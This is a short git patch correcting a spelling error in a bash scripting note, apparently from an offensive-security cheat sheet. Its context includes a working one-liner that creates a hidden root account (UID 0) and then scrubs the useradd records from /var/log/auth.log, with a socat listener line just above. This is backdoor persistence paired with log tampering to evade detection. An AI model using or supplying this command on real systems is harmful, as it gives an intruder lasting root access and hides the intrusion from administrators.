From c269df3166f4e52e1e246e830bba16c4ab18dca0 Mon Sep 17 00:00:00 2001 From: oXis Date: Thu, 19 Jun 2014 14:32:42 +0100 Subject: [PATCH] spelling --- scripting/bash.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 8fd18c5..48fe853 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -128,7 +128,7 @@ socat readline TCP-LISTEN:1234 ``` **One line root useradd** -It create a new root user. You have to change some parameters. +It creates a new root user. You have to change some parameters. ```bash USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here" && sudo useradd -p $PASSWORD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' /var/log/auth.log ```